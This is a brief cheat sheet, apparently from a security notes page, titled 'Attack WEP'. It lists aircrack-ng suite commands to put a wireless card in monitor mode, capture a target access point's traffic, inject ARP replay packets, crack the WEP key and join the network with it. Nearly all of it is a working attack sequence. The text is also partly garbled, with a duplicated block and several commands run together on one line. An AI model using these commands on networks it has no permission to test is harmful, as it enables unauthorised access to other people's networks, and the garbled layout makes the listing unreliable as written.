Attack WEP
# start monitor mode
sudo airmon-ng start wlan0
# stop monitor mode / wanna connect the wifi
sudo airmon-ng stop wlan0
# filter wps encryption
sudo airodump-ng wlan0mon --wpsLast updated
# start monitor mode
sudo airmon-ng start wlan0
# stop monitor mode / wanna connect the wifi
sudo airmon-ng stop wlan0
# filter wps encryption
sudo airodump-ng wlan0mon --wpsLast updated
sudo airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w capture_WEP wlan0sudo aireplay-ng -3 -b $NAME_OF_SSID -h $STATION_MAC wlan0sudo aircrack-ng capture_WEP.capsudo iwconfig wlan0 essid <target SSID Name> key <hexKey>
# refresh the DHCP Configuration
sudo dhclient wlan0